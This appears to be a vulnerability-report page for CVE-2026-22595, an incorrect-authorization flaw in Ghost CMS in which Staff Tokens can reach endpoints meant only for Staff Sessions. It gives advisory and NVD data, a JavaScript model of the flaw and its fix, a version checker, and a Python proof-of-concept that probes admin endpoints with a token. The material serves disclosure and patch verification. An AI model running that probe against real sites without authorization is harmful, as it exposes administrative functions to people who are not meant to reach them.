Security Vulnerability Report
CVE-2026-22595 CVSS 8.1 HIGH

CVE-2026-22595

Published: 2026-01-10 03:15:51
Last Modified: 2026-01-15 18:34:49

Description

Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that had been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0. NVD classifies the weakness as CWE-863 (Incorrect Authorization): the caller is authenticated and holds the right role, but the endpoint never checks which authentication method (token versus interactive session) was used. The CVSS vector below rates the integrity and availability impact as high and the confidentiality impact as none.
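The pattern behind this CVE, as an added illustration written for this page (it is not Ghost's code, and the request shape, the `authType` field, the token table and the endpoint policy table are all assumptions): two authentication methods resolve to the same user record, and an authorization layer that only looks at the user's role lets a Staff Token reach a route meant for Staff Sessions. The hardened dispatcher adds the one check that was missing.

```javascript
// Illustrative model of the CWE-863 pattern in CVE-2026-22595. Example code
// for this page, not Ghost's implementation; every name below is assumed.

// Constructed fixture: one staff token that belongs to an Administrator.
// A real implementation verifies a signed token; a table lookup stands in.
const STAFF_TOKENS = {
  'tok_admin_1': { userId: 'u1', role: 'Administrator' },
};

// Endpoint policy. `sessionOnly` marks routes that must be driven by an
// interactive staff session, not by an external system holding a token.
// Which real Ghost routes were session-only is not stated on this page;
// the two entries are assumed for the demonstration.
const ENDPOINTS = {
  '/ghost/api/admin/posts/':    { roles: ['Owner', 'Administrator', 'Editor'], sessionOnly: false },
  '/ghost/api/admin/settings/': { roles: ['Owner', 'Administrator'],           sessionOnly: true },
};

// Resolve the caller. Both paths return the same shape, differing only in
// `authType`, which is the field a correct authorization check must consult.
function authenticate(req) {
  if (req.session && req.session.userId) {
    return { userId: req.session.userId, role: req.session.role, authType: 'session' };
  }
  const header = (req.headers && req.headers.authorization) || '';
  if (header.startsWith('Ghost ')) {
    const owner = STAFF_TOKENS[header.slice('Ghost '.length)];
    if (owner) return { ...owner, authType: 'staff_token' };
  }
  return null;
}

// Vulnerable dispatch: checks who the caller is but never how they
// authenticated, so a token holder passes the role check on a
// session-only route.
function dispatchVulnerable(req) {
  const auth = authenticate(req);
  if (!auth) return 401;
  const policy = ENDPOINTS[req.path];
  if (!policy) return 404;
  if (!policy.roles.includes(auth.role)) return 403;
  return 200;
}

// Hardened dispatch: the same role check plus an explicit gate on the
// authentication method for routes flagged `sessionOnly`.
function dispatchHardened(req) {
  const auth = authenticate(req);
  if (!auth) return 401;
  const policy = ENDPOINTS[req.path];
  if (!policy) return 404;
  if (!policy.roles.includes(auth.role)) return 403;
  if (policy.sessionOnly && auth.authType !== 'session') return 403;
  return 200;
}

// Request builders for the demonstration.
function tokenRequest(path, token) {
  return { path, headers: { authorization: `Ghost ${token}` } };
}
function sessionRequest(path, userId, role) {
  return { path, headers: {}, session: { userId, role } };
}

// The same Administrator reaching the same route, once by token and once
// by session.
const byToken = tokenRequest('/ghost/api/admin/settings/', 'tok_admin_1');
const bySession = sessionRequest('/ghost/api/admin/settings/', 'u1', 'Administrator');
console.log('vulnerable, token   ->', dispatchVulnerable(byToken)); // 200: bypass
console.log('hardened,   token   ->', dispatchHardened(byToken));   // 403
console.log('hardened,   session ->', dispatchHardened(bySession)); // 200
```

The design point is that the authentication method is an authorization input in its own right: if a route exists only for interactive staff, the policy must say so and the dispatcher must read it, because the role check alone cannot tell a browser session from an automation token that maps to the same user.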

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
    Ghost CMS 5.121.0 up to but not including 5.130.6 (5.121.0 - 5.130.5; fixed in 5.130.6)
cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
    Ghost CMS 6.0.0 up to but not including 6.11.0 (6.0.0 - 6.10.3; fixed in 6.11.0)
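An added example of turning the affected-version data above into an "am I affected" check. The two range objects are copied from the NVD configuration on this page (start inclusive, end exclusive, with the end value being the fixed release); the parsing and comparison code is written for this page and is not an NVD or Ghost library. It handles the general NVD bound fields, not only the two used here.

```javascript
// Decide whether an installed Ghost version is inside the affected ranges
// published for CVE-2026-22595. Example code for this page.

// Constructed from the page's NVD "configurations" data, trimmed to the
// fields the check needs.
const NVD_CONFIGURATIONS = [{
  nodes: [{
    operator: 'OR',
    negate: false,
    cpeMatch: [
      { vulnerable: true, criteria: 'cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*',
        versionStartIncluding: '5.121.0', versionEndExcluding: '5.130.6' },
      { vulnerable: true, criteria: 'cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*',
        versionStartIncluding: '6.0.0', versionEndExcluding: '6.11.0' },
    ],
  }],
}];

// Collect every vulnerable cpeMatch entry from the NVD configurations array.
function affectedRanges(configurations) {
  const ranges = [];
  for (const conf of configurations) {
    for (const node of conf.nodes) {
      for (const m of node.cpeMatch) {
        if (m.vulnerable) ranges.push(m);
      }
    }
  }
  return ranges;
}

// Parse "MAJOR.MINOR.PATCH"; a leading "v" or a pre-release suffix such as
// "-rc.1" is tolerated and ignored because the NVD ranges are plain releases.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// True when `version` satisfies every bound present on a cpeMatch entry.
// NVD uses four optional bounds; an absent bound is open-ended.
function inRange(version, m) {
  if (m.versionStartIncluding && compareVersions(version, m.versionStartIncluding) < 0) return false;
  if (m.versionStartExcluding && compareVersions(version, m.versionStartExcluding) <= 0) return false;
  if (m.versionEndIncluding && compareVersions(version, m.versionEndIncluding) > 0) return false;
  if (m.versionEndExcluding && compareVersions(version, m.versionEndExcluding) >= 0) return false;
  return true;
}

function isAffected(version, configurations = NVD_CONFIGURATIONS) {
  return affectedRanges(configurations).some(m => inRange(version, m));
}

// The fixed release the installed version should move to, or null when the
// version is outside every affected range (or the range has no exclusive end).
function fixedReleaseFor(version, configurations = NVD_CONFIGURATIONS) {
  const hit = affectedRanges(configurations).find(m => inRange(version, m));
  return hit ? (hit.versionEndExcluding || null) : null;
}

// Usage: feed in the version reported by the installation.
for (const v of ['5.120.9', '5.121.0', '5.130.5', '5.130.6', '6.10.3', '6.11.0']) {
  console.log(v, isAffected(v) ? `affected, upgrade to ${fixedReleaseFor(v)}` : 'not affected');
}
```

Note the boundary handling: 5.130.5 and 6.10.3 are the last affected releases, while 5.130.6 and 6.11.0 are the exclusive upper bounds and are therefore reported as not affected, matching the "through 5.130.5" and "through 6.10.3" wording of the description.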

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-22595 PoC - Ghost CMS Staff Token authentication bypass
# Checks whether endpoints intended to be reachable only with a Staff Session
# (the logged-in browser session) also answer to a Staff Token.

TARGET_URL = "https://target-ghost-site.com"
# Ghost's Admin API "Ghost <token>" scheme expects a short-lived JWT derived
# from the key's id:secret rather than the raw secret; this script assumes
# STAFF_TOKEN already holds whatever form the target accepts for an
# Admin/Owner-role user.
STAFF_TOKEN = "your-staff-token-here"

# Endpoints the PoC treats as Staff Session only. This list is the PoC's own
# assumption; the advisory does not name the affected endpoints.
SENSITIVE_ENDPOINTS = [
    "/ghost/api/admin/users/",
    "/ghost/api/admin/settings/",
    "/ghost/api/admin/invites/",
    "/ghost/api/admin/roles/",
]


def classify(status_code):
    """Map an HTTP status to a verdict. 401 (authentication refused) and
    403 (authorization refused) both mean the endpoint rejected the token,
    so the original 200-or-401 test is widened here to cover 403."""
    if status_code == 200:
        return "VULNERABLE"
    if status_code in (401, 403):
        return "SAFE"
    return "UNKNOWN"


def test_auth_bypass(target_url=TARGET_URL, staff_token=STAFF_TOKEN):
    """Request each endpoint with the token and report a verdict per endpoint.

    A 200 shows the token reached the endpoint; confirm it is this bug rather
    than normal token access by running the same script against a patched
    instance (5.130.6 / 6.11.0) and comparing the results.
    """
    headers = {
        "Authorization": f"Ghost {staff_token}",
        "Content-Type": "application/json",
    }
    print("[*] Testing Ghost CMS authentication bypass (CVE-2026-22595)")
    print(f"[*] Target: {target_url}")
    print(f"[*] Token: {staff_token[:10]}...")
    print("-" * 50)

    results = {}
    for endpoint in SENSITIVE_ENDPOINTS:
        url = f"{target_url}{endpoint}"
        try:
            response = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as exc:
            print(f"[ERROR] {endpoint} - {exc}")
            results[endpoint] = "ERROR"
            continue
        verdict = classify(response.status_code)
        results[endpoint] = verdict
        if verdict == "VULNERABLE":
            print(f"[VULNERABLE] {endpoint} - accessible via Staff Token (status {response.status_code})")
        elif verdict == "SAFE":
            print(f"[SAFE] {endpoint} - rejected (status {response.status_code})")
        else:
            print(f"[?] {endpoint} - status {response.status_code}")
    return results


if __name__ == "__main__":
    test_auth_bypass()

References

https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx (Vendor Advisory, Patch)
https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8 (Patch)
https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3 (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22595",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T03:15:50.553",
    "lastModified": "2026-01-15T18:34:49.013",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that have been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-863" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "5.121.0",
                "versionEndExcluding": "5.130.6",
                "matchCriteriaId": "ECA8ED19-2E79-4689-ACDD-C5A3F60BC162"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "6.0.0",
                "versionEndExcluding": "6.11.0",
                "matchCriteriaId": "9EC484AC-A1F0-4C13-BFAB-9DA57116957D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}